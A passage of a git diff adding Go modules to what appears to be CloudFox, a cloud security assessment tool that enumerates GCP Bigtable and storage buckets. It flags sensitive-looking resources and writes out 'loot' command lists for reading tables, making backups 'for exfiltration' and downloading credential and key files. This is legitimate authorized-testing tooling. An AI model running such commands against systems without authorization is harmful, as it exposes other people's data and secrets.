m.ProjectIDs, globals.GCP_BIGTABLE_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + allTables := m.getAllTables() + + if len(allInstances) == 0 { + logger.InfoM("No Bigtable instances found", globals.GCP_BIGTABLE_MODULE_NAME) + return + } + + // Count public instances and tables + publicInstanceCount := 0 + publicTableCount := 0 + for _, instance := range allInstances { + if instance.PublicAccess { + publicInstanceCount++ + } + } + for _, table := range allTables { + if table.PublicAccess { + publicTableCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s) with %d table(s)", + len(allInstances), len(allTables)), globals.GCP_BIGTABLE_MODULE_NAME) + + if publicInstanceCount > 0 || publicTableCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public instance(s), %d public table(s)!", + publicInstanceCount, publicTableCount), globals.GCP_BIGTABLE_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BigtableModule) getAllInstances() []bigtableservice.BigtableInstanceInfo { + var all []bigtableservice.BigtableInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *BigtableModule) getAllTables() []bigtableservice.BigtableTableInfo { + var all []bigtableservice.BigtableTableInfo + for _, tables := range m.ProjectTables { + all = append(all, tables...) 
+ } + return all +} + +func (m *BigtableModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Bigtable in project: %s", projectID), globals.GCP_BIGTABLE_MODULE_NAME) + } + + svc := bigtableservice.New() + result, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGTABLE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Bigtable instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectInstances[projectID] = result.Instances + m.ProjectTables[projectID] = result.Tables + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["bigtable-commands"] = &internal.LootFile{ + Name: "bigtable-commands", + Contents: "# Bigtable Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, instance := range result.Instances { + m.addInstanceToLoot(projectID, instance) + } + for _, table := range result.Tables { + m.addTableToLoot(projectID, table) + } + m.mu.Unlock() +} + +func (m *BigtableModule) addInstanceToLoot(projectID string, instance bigtableservice.BigtableInstanceInfo) { + lootFile := m.LootMap[projectID]["bigtable-commands"] + if lootFile == nil { + return + } + + var clusterNames []string + for _, cluster := range instance.Clusters { + clusterNames = append(clusterNames, cluster.Name) + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BIGTABLE INSTANCE: %s\n"+ + "# =============================================================================\n"+ + "# Display Name: %s\n"+ + "# Type: %s, State: %s\n"+ + "# Clusters: %s\n", + instance.Name, instance.DisplayName, + instance.Type, instance.State, + 
strings.Join(clusterNames, ", "), + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe instance: +gcloud bigtable instances describe %s --project=%s + +# List clusters in instance: +gcloud bigtable clusters list --instances=%s --project=%s + +# List tables (gcloud): +gcloud bigtable instances tables list --instances=%s --project=%s + +# List tables (cbt): +cbt -project %s -instance %s ls + +# Get instance IAM policy: +gcloud bigtable instances get-iam-policy %s --project=%s + +# List app profiles: +gcloud bigtable instances app-profiles list --instance=%s --project=%s + +# === EXPLOIT COMMANDS === + +# List all tables in the instance: +cbt -project %s -instance %s ls +# (See per-table commands below for specific read/lookup/dump commands) + +`, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.ProjectID, instance.Name, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.ProjectID, instance.Name, + ) + + // Add backup command with actual cluster name if available + if len(clusterNames) > 0 { + lootFile.Contents += fmt.Sprintf( + "# Create a backup (for exfiltration) - replace TABLE_NAME with actual table:\n"+ + "gcloud bigtable backups create cloudfox-backup --instance=%s --cluster=%s --table=TABLE_NAME --expiration-date=$(date -u -d '+7 days' '+%%Y-%%m-%%dT%%H:%%M:%%SZ') --project=%s --async\n\n", + instance.Name, clusterNames[0], instance.ProjectID, + ) + } +} + +func (m *BigtableModule) addTableToLoot(projectID string, table bigtableservice.BigtableTableInfo) { + lootFile := m.LootMap[projectID]["bigtable-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# TABLE: %s (Instance: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Read first 10 rows:\n"+ + 
"cbt -project %s -instance %s read %s count=10\n"+ + "# Get table IAM policy:\n"+ + "gcloud bigtable instances tables get-iam-policy %s --instance=%s --project=%s\n"+ + "# Describe table (column families):\n"+ + "cbt -project %s -instance %s ls %s\n\n", + table.Name, table.InstanceName, + table.ProjectID, table.InstanceName, table.Name, + table.Name, table.InstanceName, table.ProjectID, + table.ProjectID, table.InstanceName, table.Name, + ) +} + +func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BigtableModule) getInstanceHeader() []string { + return []string{"Project", "Instance", "Display Name", "Type", "State", "Clusters", "IAM Binding Role", "IAM Binding Principal", "Public"} +} + +func (m *BigtableModule) getTableHeader() []string { + return []string{"Project", "Instance", "Table", "IAM Binding Role", "IAM Binding Principal", "Public"} +} + +func (m *BigtableModule) instancesToTableBody(instances []bigtableservice.BigtableInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + publicAccess := "No" + if instance.PublicAccess { + publicAccess = "Yes" + } + + var clusterDetails []string + for _, cluster := range instance.Clusters { + clusterDetails = append(clusterDetails, fmt.Sprintf("%s (%s)", cluster.Name, cluster.Location)) + } + clusters := "-" + if len(clusterDetails) > 0 { + clusters = strings.Join(clusterDetails, ", ") + } + + if len(instance.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.DisplayName, + instance.Type, + instance.State, + clusters, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range instance.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + 
instance.DisplayName, + instance.Type, + instance.State, + clusters, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m *BigtableModule) tablesToTableBody(tables []bigtableservice.BigtableTableInfo) [][]string { + var body [][]string + for _, table := range tables { + publicAccess := "No" + if table.PublicAccess { + publicAccess = "Yes" + } + + if len(table.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(table.ProjectID), + table.InstanceName, + table.Name, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(table.ProjectID), + table.InstanceName, + table.Name, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m *BigtableModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + if tables, ok := m.ProjectTables[projectID]; ok && len(tables) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-tables", + Header: m.getTableHeader(), + Body: m.tablesToTableBody(tables), + }) + } + + return tableFiles +} + +func (m *BigtableModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectInstances { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && 
loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigtableOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGTABLE_MODULE_NAME) + } +} + +func (m *BigtableModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + allTables := m.getAllTables() + + var tableFiles []internal.TableFile + + if len(allInstances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } + + if len(allTables) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-tables", + Header: m.getTableHeader(), + Body: m.tablesToTableBody(allTables), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BigtableOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGTABLE_MODULE_NAME) + } +} diff --git a/gcp/commands/bigtableenum.go 
b/gcp/commands/bigtableenum.go new file mode 100644 index 00000000..a8cac26e --- /dev/null +++ b/gcp/commands/bigtableenum.go @@ -0,0 +1,253 @@ +package commands + +import ( + "context" + "fmt" + "sync" + + bigtableenumservice "github.com/BishopFox/cloudfox/gcp/services/bigtableEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBigtableEnumCommand = &cobra.Command{ + Use: globals.GCP_BIGTABLEENUM_MODULE_NAME, + Aliases: []string{"bt-enum", "bt-scan"}, + Short: "Scan Bigtable instances, tables, and column families for sensitive data indicators", + Long: `Scan Bigtable metadata for potentially sensitive data. + +Scans instance names, table names, and column family names against sensitive +data patterns (credentials, PII, financial, compliance keywords). + +Detects resources with names suggesting they store: +- Credentials, tokens, or secrets +- PII (SSN, credit cards) +- Financial data (payments, billing, salary) +- Compliance-labeled data (HIPAA, GDPR, PII)`, + Run: runGCPBigtableEnumCommand, +} + +type BigtableEnumModule struct { + gcpinternal.BaseGCPModule + ProjectResources map[string][]bigtableenumservice.SensitiveBTResource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +type BigtableEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigtableEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigtableEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigtableEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGTABLEENUM_MODULE_NAME) + if err != nil { + return + } + + module := &BigtableEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]bigtableenumservice.SensitiveBTResource), + LootMap: 
make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigtableEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Scanning Bigtable resources for sensitive data indicators...", globals.GCP_BIGTABLEENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGTABLEENUM_MODULE_NAME, m.processProject) + + allResources := m.getAllResources() + if len(allResources) == 0 { + logger.InfoM("No sensitive Bigtable resources found", globals.GCP_BIGTABLEENUM_MODULE_NAME) + return + } + + criticalCount := 0 + highCount := 0 + for _, r := range allResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive Bigtable resources (%d CRITICAL, %d HIGH)", + len(allResources), criticalCount, highCount), globals.GCP_BIGTABLEENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *BigtableEnumModule) getAllResources() []bigtableenumservice.SensitiveBTResource { + var all []bigtableenumservice.SensitiveBTResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) 
+ } + return all +} + +func (m *BigtableEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning Bigtable in project: %s", projectID), globals.GCP_BIGTABLEENUM_MODULE_NAME) + } + + svc := bigtableenumservice.New() + + resources, err := svc.EnumerateSensitiveResources(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGTABLEENUM_MODULE_NAME, + fmt.Sprintf("Could not scan Bigtable in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectResources[projectID] = resources + + if len(resources) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "bigtable-enum-commands", + Contents: "# Bigtable Commands for Sensitive Resources\n# Generated by CloudFox\n\n", + } + for _, r := range resources { + if r.Table != "" { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s/%s\n# %s\ncbt -project %s -instance %s read %s count=10\n\n", + r.RiskLevel, r.Category, r.Instance, r.Table, + r.Description, + projectID, r.Instance, r.Table, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - instance: %s\n# %s\ncbt -project %s -instance %s ls\n\n", + r.RiskLevel, r.Category, r.Instance, + r.Description, + projectID, r.Instance, + ) + } + } + m.LootMap[projectID]["bigtable-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *BigtableEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeBigtableHierarchicalOutput(ctx, logger) + } else { + m.writeBigtableFlatOutput(ctx, logger) + } +} + +func (m *BigtableEnumModule) getHeader() []string { + return []string{"Project", "Instance", "Table", "Column Family", "Category", "Risk Level", "Description"} +} + +func (m *BigtableEnumModule) 
resourcesToTableBody(resources []bigtableenumservice.SensitiveBTResource) [][]string { + var body [][]string + for _, r := range resources { + body = append(body, []string{ + m.GetProjectName(r.ProjectID), + r.Instance, + r.Table, + r.ColumnFamily, + r.Category, + r.RiskLevel, + r.Description, + }) + } + return body +} + +func (m *BigtableEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + resources := m.ProjectResources[projectID] + if len(resources) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "bigtable-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(resources), + }, + } +} + +func (m *BigtableEnumModule) writeBigtableHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, resources := range m.ProjectResources { + if len(resources) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigtableEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGTABLEENUM_MODULE_NAME) + } +} + +func (m *BigtableEnumModule) writeBigtableFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + if len(allResources) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "bigtable-enum", + Header: m.getHeader(), + Body: 
m.resourcesToTableBody(allResources), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BigtableEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGTABLEENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go new file mode 100644 index 00000000..7bc9e505 --- /dev/null +++ b/gcp/commands/bucketenum.go @@ -0,0 +1,617 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bucketenumservice "github.com/BishopFox/cloudfox/gcp/services/bucketEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + bucketEnumMaxObjects int + bucketEnumAllObjects bool + bucketEnumNoLimit bool + maxObjectsWasSet bool // tracks if --max-objects was explicitly set +) + +var GCPStorageEnumCommand = &cobra.Command{ + Use: globals.GCP_STORAGEENUM_MODULE_NAME, + Aliases: []string{"bucket-enum", "bucket-scan", "gcs-enum", "sensitive-files"}, + Short: "Enumerate GCS buckets for sensitive files (credentials, secrets, configs)", + Long: `Enumerate GCS buckets to find potentially sensitive files. 
+ +This module scans bucket contents for files that may contain: +- Credentials (service account keys, SSH keys, certificates) +- Secrets (environment files, API keys, tokens) +- Configuration files (may contain hardcoded secrets) +- Database backups +- Terraform state files +- Source code/git repositories + +File categories detected: +- Credential: .json keys, .pem, .key, .p12, SSH keys +- Secret: .env, passwords, API keys, tokens +- Config: YAML, properties, settings files +- Backup: SQL dumps, archives +- Source: Git repositories +- Cloud: Cloud Functions source, build artifacts + +Flags: + --all-objects Report ALL bucket objects (not just sensitive files) + --no-limit Remove the 1000 object-per-bucket scan limit + --max-objects Set a custom object-per-bucket scan limit + +By default, only sensitive files are reported with a 1000 object scan limit. +WARNING: --all-objects and --no-limit may take a long time for large buckets.`, + Run: runGCPStorageEnumCommand, +} + +func init() { + GCPStorageEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket") + GCPStorageEnumCommand.Flags().BoolVar(&bucketEnumAllObjects, "all-objects", false, "Report ALL objects, not just sensitive files (implies --no-limit unless --max-objects is set)") + GCPStorageEnumCommand.Flags().BoolVar(&bucketEnumNoLimit, "no-limit", false, "Remove the 1000 object-per-bucket scan limit (still only reports sensitive files)") +} + +type BucketEnumModule struct { + gcpinternal.BaseGCPModule + ProjectSensitiveFiles map[string][]bucketenumservice.SensitiveFileInfo // projectID -> files + ProjectAllObjects map[string][]bucketenumservice.ObjectInfo // projectID -> all objects (when --all-objects) + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + EnumerateAll bool // whether to enumerate all objects + MaxObjects int // max objects per bucket (0 = unlimited) + mu sync.Mutex +} + +type BucketEnumOutput struct { + Table 
[]internal.TableFile + Loot []internal.LootFile +} + +func (o BucketEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BucketEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPStorageEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_STORAGEENUM_MODULE_NAME) + if err != nil { + return + } + + // Determine effective max objects limit + effectiveMaxObjects := bucketEnumMaxObjects + maxObjectsExplicitlySet := cmd.Flags().Changed("max-objects") + + // --no-limit flag sets unlimited + if bucketEnumNoLimit { + effectiveMaxObjects = 0 + } + + // --all-objects implies no limit UNLESS --max-objects was explicitly set + if bucketEnumAllObjects && !maxObjectsExplicitlySet { + effectiveMaxObjects = 0 + } + + module := &BucketEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectSensitiveFiles: make(map[string][]bucketenumservice.SensitiveFileInfo), + ProjectAllObjects: make(map[string][]bucketenumservice.ObjectInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + EnumerateAll: bucketEnumAllObjects, + MaxObjects: effectiveMaxObjects, + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) { + maxMsg := fmt.Sprintf("%d", m.MaxObjects) + if m.MaxObjects == 0 { + maxMsg = "unlimited" + } + + if m.EnumerateAll { + logger.InfoM(fmt.Sprintf("Enumerating ALL bucket contents (%s objects per bucket)...", maxMsg), globals.GCP_STORAGEENUM_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (%s objects per bucket)...", maxMsg), globals.GCP_STORAGEENUM_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_STORAGEENUM_MODULE_NAME, m.processProject) + + if m.EnumerateAll { + // Full enumeration mode + allObjects := m.getAllObjects() + if len(allObjects) == 0 { + logger.InfoM("No objects found in 
buckets", globals.GCP_STORAGEENUM_MODULE_NAME) + return + } + + // Count public objects + publicCount := 0 + for _, obj := range allObjects { + if obj.IsPublic { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d object(s) across all buckets (%d public)", + len(allObjects), publicCount), globals.GCP_STORAGEENUM_MODULE_NAME) + } else { + // Sensitive files mode + allFiles := m.getAllSensitiveFiles() + if len(allFiles) == 0 { + logger.InfoM("No sensitive files found", globals.GCP_STORAGEENUM_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, file := range allFiles { + switch file.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potentially sensitive file(s) (%d CRITICAL, %d HIGH)", + len(allFiles), criticalCount, highCount), globals.GCP_STORAGEENUM_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BucketEnumModule) getAllObjects() []bucketenumservice.ObjectInfo { + var all []bucketenumservice.ObjectInfo + for _, objects := range m.ProjectAllObjects { + all = append(all, objects...) + } + return all +} + +func (m *BucketEnumModule) getAllSensitiveFiles() []bucketenumservice.SensitiveFileInfo { + var all []bucketenumservice.SensitiveFileInfo + for _, files := range m.ProjectSensitiveFiles { + all = append(all, files...) 
+ } + return all +} + +func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning buckets in project: %s", projectID), globals.GCP_STORAGEENUM_MODULE_NAME) + } + + svc := bucketenumservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + if m.EnumerateAll { + m.LootMap[projectID]["storage-enum-all-commands"] = &internal.LootFile{ + Name: "storage-enum-all-commands", + Contents: "# GCS Download Commands for All Objects\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } else { + m.LootMap[projectID]["storage-enum-sensitive-commands"] = &internal.LootFile{ + Name: "storage-enum-sensitive-commands", + Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["storage-enum-commands"] = &internal.LootFile{ + Name: "storage-enum-commands", + Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + } + m.mu.Unlock() + + // Get list of buckets + buckets, err := svc.GetBucketsList(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGEENUM_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) + return + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_STORAGEENUM_MODULE_NAME) + } + + if m.EnumerateAll { + // Enumerate ALL objects in each bucket + var projectObjects []bucketenumservice.ObjectInfo + for _, bucketName := range buckets { + objects, err := svc.EnumerateAllBucketObjects(bucketName, 
projectID, m.MaxObjects) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGEENUM_MODULE_NAME, + fmt.Sprintf("Could not enumerate bucket %s in project %s", bucketName, projectID)) + continue + } + projectObjects = append(projectObjects, objects...) + } + + m.mu.Lock() + m.ProjectAllObjects[projectID] = projectObjects + // Group objects by bucket and add bucket-level headers + currentBucket := "" + for _, obj := range projectObjects { + if obj.BucketName != currentBucket { + currentBucket = obj.BucketName + if lootFile := m.LootMap[projectID]["storage-enum-all-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUCKET: gs://%s\n"+ + "# =============================================================================\n\n", + currentBucket, + ) + } + } + m.addObjectToLoot(projectID, obj) + } + m.mu.Unlock() + } else { + // Scan for sensitive files only + var projectFiles []bucketenumservice.SensitiveFileInfo + for _, bucketName := range buckets { + files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, m.MaxObjects) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGEENUM_MODULE_NAME, + fmt.Sprintf("Could not scan bucket %s in project %s", bucketName, projectID)) + continue + } + projectFiles = append(projectFiles, files...) 
+ } + + m.mu.Lock() + m.ProjectSensitiveFiles[projectID] = projectFiles + // Group files by bucket and add bucket-level headers + currentBucket := "" + for _, file := range projectFiles { + if file.BucketName != currentBucket { + currentBucket = file.BucketName + for _, lootName := range []string{"storage-enum-commands", "storage-enum-sensitive-commands"} { + if lootFile := m.LootMap[projectID][lootName]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUCKET: gs://%s\n"+ + "# =============================================================================\n\n", + currentBucket, + ) + } + } + } + m.addFileToLoot(projectID, file) + } + m.mu.Unlock() + } +} + +func (m *BucketEnumModule) addObjectToLoot(projectID string, obj bucketenumservice.ObjectInfo) { + if lootFile := m.LootMap[projectID]["storage-enum-all-commands"]; lootFile != nil { + publicMarker := "" + if obj.IsPublic { + publicMarker = " [PUBLIC]" + } + // Build local directory path: bucket/BUCKETNAME/OBJECTPATH/ + localDir := fmt.Sprintf("bucket/%s/%s", obj.BucketName, getObjectDir(obj.ObjectName)) + localCpCmd := fmt.Sprintf("gsutil cp gs://%s/%s %s", obj.BucketName, obj.ObjectName, localDir) + lootFile.Contents += fmt.Sprintf( + "# gs://%s/%s%s\n"+ + "# Size: %d bytes, Type: %s\n"+ + "mkdir -p %s\n"+ + "%s\n\n", + obj.BucketName, obj.ObjectName, publicMarker, + obj.Size, obj.ContentType, + localDir, + localCpCmd, + ) + } +} + +func (m *BucketEnumModule) addFileToLoot(projectID string, file bucketenumservice.SensitiveFileInfo) { + // Build local directory path: bucket/BUCKETNAME/OBJECTPATH/ + localDir := fmt.Sprintf("bucket/%s/%s", file.BucketName, getObjectDir(file.ObjectName)) + localCpCmd := fmt.Sprintf("gsutil cp gs://%s/%s %s", file.BucketName, file.ObjectName, localDir) + + // All files go to the general commands file (without risk ranking) + if lootFile := m.LootMap[projectID]["storage-enum-commands"]; 
lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# %s - gs://%s/%s\n"+ + "# %s, Size: %d bytes\n"+ + "mkdir -p %s\n"+ + "%s\n\n", + file.Category, + file.BucketName, file.ObjectName, + file.Description, file.Size, + localDir, + localCpCmd, + ) + } + + // CRITICAL and HIGH risk files also go to the sensitive commands file + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + if lootFile := m.LootMap[projectID]["storage-enum-sensitive-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - gs://%s/%s\n"+ + "# Category: %s, Size: %d bytes\n"+ + "mkdir -p %s\n"+ + "%s\n\n", + file.RiskLevel, file.Category, + file.BucketName, file.ObjectName, + file.Description, file.Size, + localDir, + localCpCmd, + ) + } + } +} + +func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BucketEnumModule) getFilesHeader() []string { + return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public", "Encryption", "Description"} +} + +func (m *BucketEnumModule) getSensitiveFilesHeader() []string { + return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public", "Encryption"} +} + +func (m *BucketEnumModule) getAllObjectsHeader() []string { + return []string{"Project", "Bucket", "Object Name", 